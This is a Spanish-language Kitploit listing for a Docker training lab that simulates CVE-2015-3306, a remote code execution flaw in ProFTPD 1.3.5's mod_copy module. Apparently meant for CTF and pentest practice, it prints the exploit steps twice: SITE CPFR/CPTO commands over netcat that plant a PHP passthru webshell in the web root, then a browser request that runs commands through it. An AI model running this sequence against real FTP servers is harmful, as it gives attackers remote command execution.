Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2015-3306-Home-Lab — CVE-2015-3306 - ProFTPD - RCE Configuración de Laboratorio Casero (Docker) fácil de usar para Red Teaming o Pruebas de Penetración | Kitploit
Herramientas/GitHubGitHub/netw0rk7/cve-2015-3306-home-lab
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónAprendizaje y EducaciónRed TeamingLabs y Práctica
GitHubnetw0rk7/cve-2015-3306-home-lab

CVE-2015-3306-Home-Lab

CVE-2015-3306 - ProFTPD - RCE Configuración de Laboratorio Casero (Docker) fácil de usar para Red Teaming o Pruebas de Penetración

Ver Repositorio
hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

ProFTPD 1.3.5 (mod_copy) — Laboratorio de Simulación de RCE

CVE20153306

Este laboratorio está diseñado para simular la vulnerabilidad CVE-2015-3306 — ProFTPD mod_copy Remote File Copy to RCE
Se utiliza para aprender Web Shell Injection RCE a través del módulo mod_copy de ProFTPD


Características

  • ProFTPD 1.3.5 vulnerable
  • mod_copy completamente habilitado (SITE CPFR / SITE CPTO)
  • Compatible con FTP anónimo
  • Apache2 + PHP5 para simular la raíz web /var/www/html
  • El atacante puede usar SITE CPFR/CPTO para copiar archivos al webroot y así desencadenar RCE
  • Se genera automáticamente un archivo flag_RANDOM.txt cada vez que se inicia el contenedor
  • Laboratorio ideal para CTF / Red Team / Entrenamiento en Pentest

Estructura de Directorios

root@kitploit:~
/etc/proftpd/proftpd.conf
/usr/local/proftpd/
/var/www/html/
/tmp/flag_xxx.txt
/entrypoint.sh

Uso (Ejecutar Contenedor)

root@kitploit:~
docker build -t sentinel7-proftpd-lab .
docker run -it --rm -p 21:21 -p 80:80 sentinel7-proftpd-lab

Método para probar la vulnerabilidad CVE-2015-3306

root@kitploit:~
nc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>

SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php

Abrir en el navegador:

root@kitploit:~
http://<IP>/webshell.php?cmd=<comando>

Bandera

Almacenada en:

root@kitploit:~
/tmp/flag_RANDOM.txt

Versión en Inglés — ProFTPD 1.3.5 (mod_copy) RCE Lab

Este laboratorio simula CVE-2015-3306 usando ProFTPD 1.3.5 con mod_copy, permitiendo a los atacantes realizar ProFTPD mod_copy Remote File Copy to RCE.


Características

  • ProFTPD 1.3.5 vulnerable compilado desde fuente
  • mod_copy habilitado (SITE CPFR + SITE CPTO)
  • Acceso FTP anónimo
  • Apache2 + PHP5 para ejecución de webshell
  • Generación automática de flag_RANDOM.txt al iniciar el contenedor
  • Perfecto para CTF, educación e investigación de exploits

Ejemplo de Prueba de Exploit

root@kitploit:~
nc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>

SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php

Luego ejecuta:

root@kitploit:~
http://<IP>/webshell.php?cmd=<comando>

Ubicación de la Bandera

root@kitploit:~
/tmp/flag_RANDOM.txt

Aviso Legal

Solo con fines educativos y pruebas de penetración autorizadas.

Descargar herramienta